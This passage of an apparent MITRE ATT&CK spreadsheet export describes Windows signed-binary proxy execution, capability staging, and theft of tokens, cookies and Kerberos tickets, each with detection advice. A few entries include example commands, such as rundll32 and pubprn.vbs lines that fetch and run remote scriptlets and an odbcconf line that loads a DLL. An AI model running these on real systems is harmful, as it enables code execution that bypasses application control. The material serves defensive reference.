Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/007</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Alexandros Pappas</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Odbcconf</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.
Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a &lt;code&gt;REGSVR&lt;/code&gt; flag that can be misused to execute DLLs (ex: &lt;code&gt;odbcconf.exe /S /A &amp;lbrace;REGSVR "C:\Users\Public\file.dll"&amp;rbrace;&lt;/code&gt;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) 
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/008</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1218.009</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; or &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/009</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Casey Smith</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Regsvr32</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)
Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/010</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>T1218.011</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Rundll32</t>
  </si>
  <si>
    <t>Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: &lt;code&gt;rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"&lt;/code&gt;  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/011</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>Casey Smith; Ricardo Dias</t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Verclsid</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)
Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running &lt;code&gt;verclsid.exe /S /C {CLSID}&lt;/code&gt;, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/012</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.</t>
  </si>
  <si>
    <t>Rodrigo Garcia, Red Canary</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution</t>
  </si>
  <si>
    <t>Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216</t>
  </si>
  <si>
    <t>Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution: PubPrn</t>
  </si>
  <si>
    <t>Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
&lt;code&gt;PubPrn.vbs&lt;/code&gt; is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is &lt;code&gt;cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>03 February 2020</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Software Deployment Tools</t>
  </si>
  <si>
    <t>Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).
Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1072</t>
  </si>
  <si>
    <t>11 December 2020</t>
  </si>
  <si>
    <t>Execution, Lateral Movement</t>
  </si>
  <si>
    <t>Detection methods will vary depending on the type of third-party software or system and how it is typically used. 
The same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. 
Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.
Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Shane Tully, @securitygypsy</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1518</t>
  </si>
  <si>
    <t>16 September 2019</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>Software Discovery: Security Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), &lt;code&gt;reg query&lt;/code&gt; with [Reg](https://attack.mitre.org/software/S0075), &lt;code&gt;dir&lt;/code&gt; with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1518/001</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</si>
  <si>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 environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.</t>
  </si>
  <si>
    <t>T1608</t>
  </si>
  <si>
    <t>Stage Capabilities</t>
  </si>
  <si>
    <t>Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)
Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):
* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)
* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.</t>
  </si>
  <si>
    <t>T1608.004</t>
  </si>
  <si>
    <t>Stage Capabilities: Drive-by Target</t>
  </si>
  <si>
    <t>Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).
Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)
Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/004</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).</t>
  </si>
  <si>
    <t>T1608.003</t>
  </si>
  <si>
    <t>Stage Capabilities: Install Digital Certificate</t>
  </si>
  <si>
    <t>Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)
Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. 
Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/003</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>T1608.005</t>
  </si>
  <si>
    <t>Stage Capabilities: Link Target</t>
  </si>
  <si>
    <t>Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. 
Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/005</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001).</t>
  </si>
  <si>
    <t>T1608.001</t>
  </si>
  <si>
    <t>Stage Capabilities: Upload Malware</t>
  </si>
  <si>
    <t>Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)
Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/001</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).</t>
  </si>
  <si>
    <t>Kobi Haimovich, CardinalOps</t>
  </si>
  <si>
    <t>T1608.002</t>
  </si>
  <si>
    <t>Stage Capabilities: Upload Tool</t>
  </si>
  <si>
    <t>Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo.
Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/002</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.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An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. 
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1528</t>
  </si>
  <si>
    <t>Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.
Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, Office 365, SaaS</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Mark Wee; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>Steal Web Session Cookie</t>
  </si>
  <si>
    <t>An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)
There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1539</t>
  </si>
  <si>
    <t>08 October 2019</t>
  </si>
  <si>
    <t>Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>File: File Access, Process: Process Access</t>
  </si>
  <si>
    <t>Johann Rehberger; Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1558</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets</t>
  </si>
  <si>
    <t>Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). 
Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558</t>
  </si>
  <si>
    <t>05 November 2020</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
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 (Citation: AdSecurity Cracking Kerberos Dec 2015)
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1558.004</t>
  </si>
